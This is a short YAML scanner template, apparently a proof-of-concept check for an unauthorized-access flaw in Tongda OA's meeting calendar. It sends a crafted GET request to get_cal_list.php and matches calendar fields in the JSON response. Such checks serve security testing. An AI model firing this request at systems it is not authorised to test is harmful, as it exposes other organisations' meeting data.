id: tongda-meeting-unauth

info:
    name: Tongda Meeting Unauthorized Access
    author: 清风明月(www.secbook.info)
    severity: low

rules:
    r0:
        request:
            method: GET
            path: /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay
            headers:
                Accept-Encoding: deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
        expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle")))
expression: r0()

